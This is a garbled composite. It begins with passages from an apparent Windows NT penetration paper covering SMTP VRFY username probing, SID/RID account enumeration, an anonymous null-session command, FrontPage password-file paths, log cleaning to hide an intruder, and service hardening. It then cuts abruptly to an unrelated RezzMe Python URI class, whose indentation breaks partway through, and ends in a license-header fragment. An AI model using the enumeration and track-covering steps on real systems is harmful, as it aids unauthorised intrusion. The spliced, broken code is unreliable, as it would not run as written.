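A sketch of such a probe in Python, using the standard smtplib module (the hostname and candidate usernames are illustrative assumptions; VRFY is the classic verb for this kind of check):

    # A 250/251 reply to VRFY means the server recognizes the address.
    import smtplib

    server = smtplib.SMTP('mail.example.com')
    server.helo('probe')                      # satisfy servers that insist on HELO first
    for name in ['administrator', 'jdoe', 'backup']:
        code, message = server.verify(name)
        print(name, code, message)
    server.quit()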
The authors of this document have three other documents planned for release in the near future, all of them part of the NT WarDoc series. We have an in-depth Denial of Service paper in the works, a Local Penetration Techniques paper, and a paper dealing with techniques one could use to guard against the topics of the other papers. We look forward to feedback from the community.
Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.
Net Computer: This adds or deletes computers from a domain's database.
Net Config Server or Net Config Workstation: Displays configuration information about the Server or Workstation service. When used without specifying Server or Workstation, the command displays a list of configurable services.
Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.
Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.
Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.
Net Helpmsg message#: Get help with a particular net error or function message.
Net Localgroup: Use this to list local groups on servers. You can also modify those groups.
Net Name: This command shows the names of computers and users to which messages are sent on the computer.
Net Pause: Use this command to suspend a certain NT service.
Net Print: Displays print jobs and shared queues.
Net Send: Use this command to send messages to other users, computers, or messaging names on the network.
Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.
Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.
Net Statistics Server or Workstation: Shows the statistics log.
Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service may stop other services.
Net Time: This command is used to display or set the time for a computer or domain.
Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.
Net User: This command will display a list of user accounts for the computer, and has options for creating and modifying those accounts.
Net View: This command displays a list of resources being shared on a computer, including NetWare servers.
Now we know all the subauthorities for the current domain. Domain accounts only differ by the last number of the SID, called a RID.
Now it is possible to look up all the domain accounts, from the very first one on (RID = 1000 for the first account, 1001 for the second, and so on; RIDs are never reused in the current installation).
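As an illustration (the server name, SID values, and account are invented, and the tool output is abbreviated), a user2sid/sid2user walk would look like this:

    C:\> user2sid \\SERVER "domain users"
    S-1-5-21-201642981-56263093-24269216-513

    C:\> sid2user \\SERVER 5 21 201642981 56263093 24269216 1000
    Name is JDOE

The first command yields the domain's subauthorities; the second walks the RIDs from 1000 upward, naming each account in turn.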
Remember that the anonymous account is also part of the Everyone group. It also happens that the anonymous account is not audited by the logon/logoff feature.
Below is an example of what you can learn provided the netbios ports are open (the listing is fictional).
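A reconstructed example of such a fictional listing, in the format an nbtstat -A query returns (all names invented):

    NetBIOS Remote Machine Name Table

    Name                Type        Status
    -----------------------------------------
    STUDENT4      <00>  UNIQUE      Registered
    DOMAIN1       <00>  GROUP       Registered
    STUDENT4      <03>  UNIQUE      Registered
    ADMINISTRATOR <03>  UNIQUE      Registered
    STUDENT4      <20>  UNIQUE      Registered

The second <03> entry betrays the locally logged-on user, as described earlier. The null session below digs further: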
net use \\131.107.2.200\ipc$ "" /user:""
/_vti_inf.html Ensures that frontpage server extensions are installed.
/_vti_pvt/service.pwd Contains the encrypted password files. Not used on IIS and WebSite servers.
/_vti_pvt/authors.pwd On Netscape servers only. Encrypted. Names and passwords of authors.
/_vti_log/author.log If author.log is there, it will need to be cleaned to cover an intruder's tracks.
ALERTER: Relies on NetBIOS over TCP/IP for network communication. This service allows a user to receive messages from other machines. These messages could be warnings or some type of pre-determined network information. I recommend disabling the Alerter service due to its NetBIOS dependency and the fact that it is hardly ever used.
CLIPBOOK SERVER: Relies on NetBIOS over TCP/IP for network communication. This server service allows the contents of the clipboard to be shared over a network. Few use it, and it should be disabled due to the possibility of a remote intruder gleaning information from it.
COMPUTER BROWSER: The Computer Browser service allows one to view available network resources by browsing via Network Neighborhood. When active on a server, the server will register its name through a NetBIOS broadcast or directly to a WINS server. I recommend disabling this service.
DHCP CLIENT: This service should be set to automatic if the machine is a DHCP client; if not, disable it.
DIRECTORY REPLICATOR: This service allows NT systems to import and export directory contents. If content replication is not needed, disable this service.
EVENT LOG: I recommend always using this service because it is the service responsible for logging activity on the server, including security activity.
LICENSE LOGGING SERVICE: Used to track use of licenses by different applications, it does not have any serious impact on the network and should be set to automatic (which is the default setting).
MESSENGER SERVICE: Relies on NetBIOS over TCP/IP for network communication. Similar to the Alerter service in both design and function. I recommend stopping this service to prevent username enumeration via NBTSTAT commands.
NET LOGON: This service is used by both Server and Workstation to provide for user authentication. This service is said to be required at all times and runs as the built-in SYSTEM user.
NETWORK DDE and DDE DSDM: These services provide dynamic data exchange. DDE is used by such applications as Chat (that's important!) and other applications that may require this type of functionality. These services are considered a moderate risk due to their TCP connection-accepting state.
NETWORK MONITOR AGENT: Network Monitor Agent is used to monitor, or sniff, the traffic passing through a network adapter card. If the SMS version of this software is in use, an administrator can remotely monitor traffic on other network adapter cards.
NT LM SECURITY SUPPORT PROVIDER: This service is present to help with backwards compatibility and authentication with older software packages.
PLUG AND PLAY: Used to configure PnP devices.
REMOTE PROCEDURE CALL LOCATOR AND SERVICES: RPC is a protocol used to encapsulate function calls over a network. Its default configuration, automatic, is standard and should be left alone. This service is considered to pose a high security risk, but the dependencies on this service are too great to disable it.
ROUTING AND REMOTE ACCESS SERVICE: This is an add-on service that enhances the functionality of WindowsNT. If you are using a modem to dial-out of your NT system, this service should be set to automatic. If you are using its routing features, also set it to automatic.
SCHEDULE: This service allows an application to be executed at a pre-specified time and date. This can pose a serious security threat as this service can be used to start applications under the SYSTEM context.
SERVER: Used as the key to all server-side NetBIOS applications, this service is somewhat needed. Without this service, some of the administrative tools, such as Server Manager, could not be used. If remote administration or access to the machine is not needed, I highly recommend disabling this service. Contrary to popular belief, this service is NOT needed on a webserver.
SPOOLER: The spooler service is used to accept requests for print jobs from clients, and to allow the local system to spool jobs to a network printer. This service should be set to automatic.
TCP/IP NETBIOS HELPER: This service helps and enhances NBT and the Net Logon service. Because the Net Logon service should be set to automatic, so should this service.
TELEPHONY SERVICE: This service is used to manage telephony drivers and dialing properties. A system that does not use any type of telephony or RAS devices should have this service disabled.
UPS: This service is used in serial communication with an Uninterruptible Power Supply.
WORKSTATION: This service allows for outbound NetBIOS connections. Because it is used in outbound connections only, it is normally not a security risk and should be set to automatic.
Although most security professionals are used to working with a HOSTS file, WindowsNT actually uses two text files to resolve hostnames to their addresses. WindowsNT still uses a HOSTS file, but it also uses an LMHOSTS file.
Much like a HOSTS file, an LMHOSTS file is a flat, sequential text file used to resolve computer names (NetBIOS) to addresses. The LMHOSTS file also allows one to use keywords, which gives it greater functionality and flexibility than a HOSTS file.
The keywords that the LMHOSTS file uses are #PRE, #DOM:domain, #INCLUDE filename, #BEGIN_ALTERNATE, and #END_ALTERNATE. If something follows a hash mark that is not one of these keywords, it is treated as a remark.
#PRE: If this keyword follows an entry in an LMHOSTS file, it tells WindowsNT to pre-load that entry into the name cache. This allows the windows system to resolve the name much quicker.
#DOM: The #DOM tag entry causes WindowsNT to associate that entry with whatever domain you specify (i.e. #DOM:accounting). This helps NT resolve certain names more efficiently because it does not have to consult routing tables to find out which domain the entry belongs in.
#INCLUDE: This entry tells WindowsNT where to look for other LMHOSTS files that reside on other machines. When using this function, one should specify the UNC path to the other LMHOSTS file. The #BEGIN_ALTERNATE and #END_ALTERNATE keywords are used in conjunction with the #INCLUDE tag and should appear before and after the #INCLUDE tag.
#!/usr/bin/python
# -*- encoding: utf-8 -*-
# Copyright (c) Contributors, http://opensimulator.org/
# See CONTRIBUTORS.TXT for a full list of copyright holders.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the OpenSim Project nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE DEVELOPERS ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# import logging
import types
import urllib
import RezzMe.parse
import RezzMe.exceptions
class Uri(object):
    '''The RezzMe.uri.Uri object encapsulates virtual world resource identifiers.

    A virtual world is identified by the hosting server, an
    optional user/avatar name and password, an optional region name
    with optional X/Y/Z coordinates. In addition RezzMe.uri.Uri
    objects can also contain a tag (short label of the target
    grid), a display tag (for use in menus), and the identifier of
    the virtual world client to use.
    '''
    def __init__(self, uri = None, display = None, client = None, userId = None):
        '''The Uri class encapsulates a RezzMe virtual world resource identifier.

        To use RezzMe.Uri you need to import it:

        >>> import RezzMe.uri

        A Uri object can be instantiated in several ways:

        - from a string:

        >>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/')
        >>> uri.PlainUri
        'rezzme://opensim.foobar.com/'

        note that if the URI contains spaces, they will be converted to '%20':

        >>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/an island')
        >>> uri.PlainUri
        'rezzme://opensim.foobar.com/an%20island'

        - from a dictionary as generated by RezzMe.parse.ParseUriAndPath():

        >>> import RezzMe.parse
        >>> import RezzMe.uri
        >>> uriDict = RezzMe.parse.ParseUriAndPath('rezzme://opensim.foobar.com:9000/island')
        >>> uri = RezzMe.uri.Uri(uriDict)
        >>> uri.PlainUri
        'rezzme://opensim.foobar.com:9000/island'

        - from another Uri object (cloning it):

        >>> aUri = RezzMe.uri.Uri('rezzme://dr%20who@opensim.foobar.com/region/1/2/3')
        >>> anotherUri = RezzMe.uri.Uri(aUri)
        >>> anotherUri.Avatar
        'dr who'
        >>> anotherUri.Avatar = 'mr torchwood'
        >>> anotherUri.FullUri
        'rezzme://mr%20torchwood@opensim.foobar.com/region/1/2/3'
        >>> aUri.FullUri
        'rezzme://dr%20who@opensim.foobar.com/region/1/2/3'

        here we cloned anotherUri from aUri. aUri had as avatar 'dr who',
        which anotherUri inherits (we are cloning aUri). we then change
        the avatar value of anotherUri to 'mr torchwood' and retrieve the
        FullUri property from both objects: aUri still has 'dr who' as avatar,
        anotherUri has 'mr torchwood'.

        Additional instantiation parameters are the tag, display,
        client, and userId meta data parameters. The tag parameter
        is a short label of the target grid. The display parameter
        is used to display a Uri in GUI menus. The client parameter
        is used to associate a particular virtual world client with
        the URI object. The userId parameter, finally, can associate
        a default userId with the Uri object.

        Uri objects can also come as auto-login Uris: if avatar name
        and password are contained in the Uri *and* the query part
        of the Uri contains 'auto' as parameter:

        >>> autoUri = RezzMe.uri.Uri('rezzme://dr%20who:SECRET@opensim.foobar.com/region/1/2/3?auto')
        >>> autoUri.AutoLogin
        True
        '''
        if uri is None:
            raise RezzMe.exceptions.RezzMeException('empty uri parameter')

        self.__plain = None
        self.__http = None
        self.__safe = None
        self.__auto = False
        self.Extensions = {}

        if isinstance(uri, str) or isinstance(uri, unicode):
            uri = uri.replace(' ', '%20')
            self.__dict = {}
            self.__orig = uri
            self._parse(uri)
        elif type(uri) is types.DictType:
            self.__dict = uri
            self._sync()
            self.__orig = self.FullUri
        elif isinstance(uri, RezzMe.uri.Uri):
            self.__dict = uri.__dict
            self._sync()
            self.__orig = uri.FullUri
            self.Extensions = uri.Extensions
            return
        else:
            raise RezzMe.exceptions.RezzMeException('unexpected uri type %s' % type(uri))

        self.Display = display
        self.Client = client
        self.UserId = userId

        # for k in self.__dict:
        #     logging.debug('uri.Uri: %s -> %s', k, self.__dict[k])
    def _sync(self):
        self.__plain = '%s://' % self.Scheme
        self.__full = self.__plain
        self.__safe = self.__plain

        if self.Scheme == 'rezzme':
            self.__http = 'http://'
        else:
            self.__http = 'https://'

        if 'avatar' in self.__dict:
            avatar = urllib.quote(self.__dict['avatar'])
            self.__full += avatar
            self.__safe += avatar
            if 'password' in self.__dict:
                self.__full += ':%s' % self.__dict['password']
            self.__full += '@'
            self.__safe += '@'

        self.__plain += self.__dict['host']
        self.__http += self.__dict['host']
        self.__safe += self.__dict['host']
        self.__full += self.__dict['host']

        if 'port' in self.__dict:
            port = ':%s' % self.__dict['port']
            self.__plain += port
            self.__http += port
            self.__safe += port
            self.__full += port

        self.__plain += '/'
        self.__safe += '/'
        self.__full += '/'

        self.__base = self.__plain

        if 'region' in self.__dict:
            self.__plain += self.__dict['region']
            self.__safe += self.__dict['region']
            self.__full += self.__dict['region']

        if 'x' in self.__dict and 'y' in self.__dict and 'z' in self.__dict:
            xyz = '/%s' % '/'.join(map(lambda x: str(x), self.XYZ))
            self.__safe += xyz
            self.__full += xyz

        if 'query' in self.__dict:
            q = self.__dict['query'].split('&')
            self.__auto = 'auto' in q
def _parse(self, uri):
self.__dict = RezzMe.parse.ParseUriAndPath(uri)
if not self.__dict:
raise RezzMe.exceptions.RezzMeException('wonky URI >%s<' % uri)
if not self.Scheme: return None
self._sync()
def _plain(self):
return self.__plain
PlainUri = property(fget = _plain,
doc = '''plain URI without avatar name, avatar password and region X/Y/Z (read-only)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.zurich.ibm.com:9000/island/127/127/24')
>>> uri.PlainUri
'rezzme://opensim.zurich.ibm.com:9000/island'
This is a read-only property; writing to it will result in an exception:
>>> uri.PlainUri = 'rezzme://opensim.zurich.ibm.com:9000/island'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _base(self):
return self.__base
BaseUri = property(fget = _base,
doc = '''base URI without avatar name, avatar password and region (read-only)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.zurich.ibm.com:9000/island/127/127/24?query')
>>> uri.BaseUri
'rezzme://opensim.zurich.ibm.com:9000/'
This is a read-only property; writing to it will result in an exception:
>>> uri.BaseUri = 'rezzme://opensim.zurich.ibm.com:9000/'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _safe(self):
return self.__safe
SafeUri = property(fget = _safe,
doc = '''URI without password (read-only)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield:secret@opensim.zurich.ibm.com:9000/island/127/127/24?query')
>>> uri.FullUri
'rezzme://dr%20scofield:secret@opensim.zurich.ibm.com:9000/island/127/127/24'
>>> uri.SafeUri
'rezzme://dr%20scofield@opensim.zurich.ibm.com:9000/island/127/127/24'
This is a read-only property; writing to it will result in an exception:
>>> uri.SafeUri = 'rezzme://dr%20scofield@opensim.zurich.ibm.com:9000/island/127/127/24'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _full(self):
return self.__full
FullUri = property(fget = _full,
doc = '''full URI including avatar name and password if available (read-only)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield:secret@opensim.zurich.ibm.com:9000/island/127/127/24?query')
>>> uri.FullUri
'rezzme://dr%20scofield:secret@opensim.zurich.ibm.com:9000/island/127/127/24'
This is a read-only property; writing to it will result in an exception:
>>> uri.FullUri = 'rezzme://dr%20scofield:secret@opensim.zurich.ibm.com:9000/island/127/127/24'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _http(self):
return self.__http
BaseHttpUri = property(fget = _http,
doc = '''base HTTP URI of the server (without trailing "/") (read-only)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield:secret@opensim.zurich.ibm.com:9000/island/127/127/24?query')
>>> uri.BaseHttpUri
'http://opensim.zurich.ibm.com:9000'
This is a read-only property; writing to it will result in an exception:
>>> uri.BaseHttpUri = 'http://opensim.zurich.ibm.com:9000'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _keyValue(self, key):
if type(key) is types.StringType:
if key in self.__dict: return self.__dict[key]
elif type(key) is types.ListType:
return [self.__dict[x] if x in self.__dict else None for x in key]
return None
def _credentials(self):
return self._keyValue(['avatar', 'password'])
def _scredentials(self, value):
if value[0] is None:
    if 'avatar' in self.__dict:
        del self.__dict['avatar']
else:
    if len(value[0].split()) != 2:
        raise RezzMe.exceptions.RezzMeException('avatar name format violation, must be "First Last", found "%s"' % value[0])
    self.__dict['avatar'] = value[0]
if value[1] is None:
    if 'password' in self.__dict:
        del self.__dict['password']
else:
    self.__dict['password'] = value[1]
self._sync()
Credentials = property(fget = _credentials, fset = _scredentials,
doc = '''list containing [avatar name, password] (read-write)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield:secret@opensim.zurich.ibm.com:9000/island/127/127/24?query')
>>> uri.Credentials
['dr scofield', 'secret']
This is a read-write property:
>>> uri.Credentials = ['dr who', 'anothersecret']
>>> uri.Credentials
['dr who', 'anothersecret']
Note that, as with RezzMe.parse, the avatar name has to follow
the format "First Last"; this will fail:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/island')
>>> uri.Credentials = ['drwho', 'secret']
Traceback (most recent call last):
...
RezzMeException: avatar name format violation, must be "First Last", found "drwho"
''')
def _avatar(self):
return self._keyValue('avatar')
def _savatar(self, value):
if value is None:
    if 'avatar' in self.__dict:
        del self.__dict['avatar']
else:
    if len(value.split()) != 2:
        raise RezzMe.exceptions.RezzMeException('avatar name format violation, must be "First Last", found "%s"' % value)
    self.__dict['avatar'] = value
self._sync()
Avatar = property(fget = _avatar, fset = _savatar,
doc = '''avatar name (read-write)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.foobar.com/island')
>>> uri.Avatar
'dr scofield'
As this is a read-write property you can set the avatar name as well:
>>> uri.Avatar = 'dr who'
>>> uri.Avatar
'dr who'
Again, the avatar name has to follow the "First Last" pattern, this will fail:
>>> uri.Avatar = 'drwho'
Traceback (most recent call last):
...
RezzMeException: avatar name format violation, must be "First Last", found "drwho"
''')
def _client(self):
return self._keyValue('client')
def _sclient(self, value):
if value is None and 'client' in self.__dict:
del self.__dict['client']
else:
self.__dict['client'] = value
Client = property(fget = _client, fset = _sclient,
doc = '''client to use (read-write)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.foobar.com/island')
>>> uri.Client
>>> uri.Client = '/opt/SL/secondlife/secondlife-1.22.11.113941/secondlife'
>>> uri.Client
'/opt/SL/secondlife/secondlife-1.22.11.113941/secondlife'
''')
def _password(self):
return self._keyValue('password')
def _spassword(self, value):
if value is None:
    if 'password' in self.__dict:
        del self.__dict['password']
else:
    self.__dict['password'] = value
self._sync()
Password = property(fget = _password, fset = _spassword,
doc = '''avatar password (read-write)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.foobar.com/island')
>>> uri.Credentials
['dr scofield', None]
>>> uri.Password
>>> uri.Password = 'secret'
>>> uri.Password
'secret'
Setting the password has an effect on Credentials and on FullUri:
>>> uri.Credentials
['dr scofield', 'secret']
>>> uri.FullUri
'rezzme://dr%20scofield:secret@opensim.foobar.com/island'
''')
def _fullyQualified(self):
return all((self.Avatar, self.Password))
FullyQualified = property(fget = _fullyQualified,
doc = '''True if this uri object contains both avatar name and password
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield:SECRET@opensim.foobar.com/island')
>>> uri.FullyQualified
True
but:
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.foobar.com/island')
>>> uri.FullyQualified
False
''')
def _autoLogin(self):
return self.__auto and self.FullyQualified
AutoLogin = property(fget = _autoLogin,
doc = '''True if this uri object is an auto-login Uri.
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield:SECRET@opensim.foobar.com/island?auto')
>>> uri.AutoLogin
True
but:
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.foobar.com/island?auto')
>>> uri.AutoLogin
False
''')
def _userId(self):
return self._keyValue('userID')
def _suserId(self, value):
if value is None and 'userID' in self.__dict:
del self.__dict['userID']
else:
self.__dict['userID'] = value
UserId = property(fget = _userId, fset = _suserId,
doc = '''user ID in case of authenticated grid (read-write)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.foobar.com/island')
>>> uri.UserId
>>> uri.UserId = 'drscofield@xyzzyxyzzy.net'
>>> uri.UserId
'drscofield@xyzzyxyzzy.net'
UserId is a pure meta property in that it has no effect on other properties such as FullUri:
>>> uri.FullUri
'rezzme://dr%20scofield@opensim.foobar.com/island'
''')
def _display(self):
display = self._keyValue('display')
if not display:
display = ''
if self.Avatar:
display += '%s@' % self.Avatar
if self.Port:
display += 'rezzme://%s:%s' % (self.Host, self.Port)
else:
display += 'rezzme://%s' % self.Host
if self.Path:
display += '/%s' % self.Path
self.Display = display
return display
def _sdisplay(self, value):
if value is None and 'display' in self.__dict:
del self.__dict['display']
else:
self.__dict['display'] = value
self._sync()
Display = property(fget = _display, fset = _sdisplay,
doc = '''string that can be used in menus and so forth (read-write)
Unless explicitly set, the Display property will return a default value
constructed from other properties of the Uri object:
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.foobar.com/island')
>>> uri.Display
'dr scofield@rezzme://opensim.foobar.com/island'
Once set, Display will return that value instead:
>>> uri.Display = 'foobar island'
>>> uri.Display
'foobar island'
Even if we change another property that the default value of Display would use,
we still get the explicitly-set value:
>>> uri.Avatar = 'dr who'
>>> uri.Display
'foobar island'
''')
def _scheme(self):
return self._keyValue('scheme')
Scheme = property(fget = _scheme,
doc = '''URI scheme (read-only)
Usually returns "rezzme":
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com:9000/island/1/2/3')
>>> uri.Scheme
'rezzme'
or "rezzmes":
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com:9000/island/1/2/3')
>>> uri.Scheme
'rezzmes'
Note that this is a read-only property; setting it will raise an exception:
>>> uri.Scheme = 'http'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _port(self):
return self._keyValue('port')
Port = property(fget = _port,
doc = '''URI port (if specified) (read-only)
Example with port provided:
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com:9000/island/1/2/3?query')
>>> uri.Port
'9000'
Example without port:
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com/island/1/2/3?query')
>>> uri.Port
Note that Port is a read-only property; setting it will raise an exception:
>>> uri.Port = 4000
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _host(self):
return self._keyValue('host')
Host = property(fget = _host,
doc = '''URI host (read-only)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com/island/1/2/3?query')
>>> uri.Host
'opensim.foobar.com'
Note that Host is a read-only property; setting it will raise an exception:
>>> uri.Host = 'opensim.foo.bar.com'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _region(self):
return self._keyValue('region')
Region = property(fget = _region,
doc = '''URI region (if specified) (read-only)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com/island/1/2/3?query')
>>> uri.Region
'island'
Note that Region is a read-only property; setting it will raise an exception:
>>> uri.Region = 'wonderland'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _decodedRegion(self):
    region = self._keyValue('region')
    return urllib.unquote(region) if region else None
DecodedRegion = property(fget = _decodedRegion,
doc = '''Decoded URI region (if specified) (read-only)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com/island/1/2/3?query')
>>> uri.DecodedRegion
'island'
but:
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com/treasure%20island/1/2/3?query')
>>> uri.DecodedRegion
'treasure island'
Note that DecodedRegion is a read-only property; setting it will raise an exception:
>>> uri.DecodedRegion = 'wonderland'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _xyz(self):
return self._keyValue(['x', 'y', 'z'])
XYZ = property(fget = _xyz,
doc = '''list containing [X, Y, Z] coordinates (if specified) (read-only)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com/island/1/2/3?query')
>>> uri.XYZ
[1, 2, 3]
Note that XYZ is a read-only property; setting it will raise an exception:
>>> uri.XYZ = [4, 5, 6]
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _location(self):
if self.Region and all(self.XYZ):
return 'secondlife://%s/%s' % (self.Region, '/'.join([str(x) for x in self.XYZ]))
elif self.Region:
return 'secondlife://%s' % self.Region
else:
return None
Location = property(fget = _location,
doc = '''location within the target grid as a secondlife:// URI (read-only)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/island/1/2/3')
>>> uri.Location
'secondlife://island/1/2/3'
or:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/wonder%20land/1/2/3')
>>> uri.Location
'secondlife://wonder%20land/1/2/3'
Note that without a region we will get None as return value:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/')
>>> uri.Location
Finally, Location is a read-only property; setting it will raise an exception:
>>> uri.Location = 'secondlife://myland/1/2/3'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _path(self):
return self._keyValue('path')
Path = property(fget = _path,
doc = '''URI region(X/Y/Z)? component (if available) (read-only)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri.Path
'myland/127/128/33'
but also:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/')
>>> uri.Path
Note that Path is a read-only property; setting it will raise an exception:
>>> uri.Path = 'yourland/127/126/32'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _query(self):
return self._keyValue('query')
Query = property(fget = _query,
doc = '''URI query component (if available)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33?query&p0=a&p1=b')
>>> uri.Query
'query&p0=a&p1=b'
but also:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri.Query
Note that Query is a read-only property; setting it will raise an exception:
>>> uri.Query = 'query&p0=x&p1=y'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _dict(self):
return self.__dict
Dict = property(fget = _dict,
doc = '''returns dictionary with all recognized components (read-only)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri.Dict
{'z': 33, 'plain': 'rezzme://opensim.foobar.com', 'region': 'myland', 'userID': None, 'slurl': 'secondlife:///myland/127/128/33', 'host': 'opensim.foobar.com', 'client': None, 'x': 127, 'y': 128, 'path': 'myland/127/128/33', 'scheme': 'rezzme', 'display': None}
Note that Dict is a read-only property; setting it will raise an exception:
>>> uri.Dict = {'z': 33, 'plain': 'rezzme://opensim.foobar.com', 'region': 'myland', 'userID': None, 'slurl': 'secondlife:///myland/127/128/33', 'host': 'opensim.foobar.com', 'client': None, 'x': 127, 'y': 128, 'path': 'yourland', 'scheme': 'rezzme', 'display': None}
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def __cmp__(self, other):
'''Override the comparison method and compare on FullUri:
Sample code:
>>> uri0 = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri1 = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri0 == uri1
True
and:
>>> uri0 = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri1 = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/3')
>>> uri0 == uri1
False
As this will only compare on FullUri, meta properties will not be taken into
account; below, uri0 gets a custom Display value but still compares equal:
>>> uri0 = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri1 = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri0.Display = 'my land'
>>> uri0 == uri1
True
'''
return cmp(self.FullUri, other.FullUri)
def __hash__(self):
'''Override the hash method to use __hash__ of FullUri instead.
The exact hash value is platform dependent, so we check it against the
hash of the FullUri string instead:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/')
>>> uri.__hash__() == hash(uri.FullUri)
True
'''
return self.FullUri.__hash__()
def __str__(self):
'''Override the str representation method and return all relevant properties.
Sample code:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/')
>>> str(uri)
'rezzme://opensim.foobar.com/ client: None/userId: None/display: rezzme://opensim.foobar.com'
Adding meta property values:
>>> uri.Client = '/path/to/client'
>>> str(uri)
'rezzme://opensim.foobar.com/ client: /path/to/client/userId: None/display: rezzme://opensim.foobar.com'
>>> uri.UserId = 'drscofield@foobar.com'
>>> str(uri)
'rezzme://opensim.foobar.com/ client: /path/to/client/userId: drscofield@foobar.com/display: rezzme://opensim.foobar.com'
'''
return '%s client: %s/userId: %s/display: %s' % (self.FullUri, self.Client, self.UserId, self.Display)
|
# **************************************************************************************
# * *
# * BOLTS - Open Library of Technical Specifications *
# * *
# * Copyright (C) 2014 Johannes Reinhardt <jreinhardt@ist-dein-freund.de> *
# * *
# * This library is free software; you can redistribute it and/or *
# * modify it under the terms of the GNU Lesser General Public *
